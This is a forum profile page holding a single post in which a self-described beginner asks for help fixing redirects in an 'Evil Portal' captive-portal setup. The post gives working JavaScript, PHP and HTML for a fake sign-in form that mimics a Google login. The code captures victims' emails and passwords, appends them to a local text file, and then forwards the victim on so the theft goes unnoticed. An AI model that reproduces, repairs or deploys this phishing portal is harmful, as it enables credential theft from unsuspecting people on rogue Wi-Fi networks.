Jump to content

iloveintegra

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

827 profile views

iloveintegra's Achievements

Newbie

Newbie (1/14)

  1. Hi Friends! I've spent an insane amount of time on this last bit of code. I've used the google-fu as best I can for being relatively noobish, I've read through all the 'Evil Portal' searches I can find. I'm relatively new to code, so please bare with me. With that said, I'm having a problem with redirects. I have an evil portal deployed it dumps the username, password, redirect then the token to a text file. (the reason I'm currently dumping the last two is for troubleshooting). When I click my final link and start the capture everything goes through and is logged correctly into the capture file. Afterwords the capture my redirect takes me to: "http://192.168.10.1/capture.php?Email=547,&Password=547,&redir1=http://192.168.10.1:8080/nodogsplash_auth/?redir=http%3A%2F%2Fwww.test.com%2F&tok=8af6d405" which then redirects to: http://192.168.10.1:8080/nodogsplash_auth/?redir=http://www.test.com/ somehow I'm losing the token on the 2nd redirect, also it seems that I'm picking up more than just the path of the redirect when I use the $redir var. If I pump in "http://www.test.com/tok=8af6d405" everything works just fine, validates and online. Here is my java: <script type="text/javascript" charset="utf-8"> function submitTextToCapture() { var email = document.getElementById("Email").value; var password = document.getElementById("Passwd").value; window.location = "http://192.168.10.1/capture.php?Email="+email+",&Password="+password+",&redir1=$authtarget"; } </script> PHP <?php $username = $_GET["Email"]; $password = $_GET["Password"]; $redir = $_GET["redir1"]; $token = $_GET["tok"]; $file = fopen("stored.txt", "a"); fwrite($file, $username . $password . $redir . $token . "\n"); fclose($file); echo '<script type="text/javascript">window.location = "' . $redir . '";</script>'; ?> Button stuff: <form id="PWND" method="POST" action="http://192.168.10.1/capture.php"> <label class="hidden" for="Email">Email</label> <input id="Email" name="Email" type="Email" placeholder="Email" value="" spellcheck="false" class=""> <label class="hidden" for="Passwd">Password</label> <input id="Passwd" name="Passwd" type="Password" placeholder="Password" class=""> <input type="button" class="rc-button rc-button-submit" onClick="submitTextToCapture()" value="Sign in" src="$authtarget"> it looks like I need to cut this (http://192.168.10.1:8080/nodogsplash_auth/) string in the first link and I can manage but it looks like that is loaded into the redir variable from the get go? Any help would be much appreciated.
×
×
  • Create New...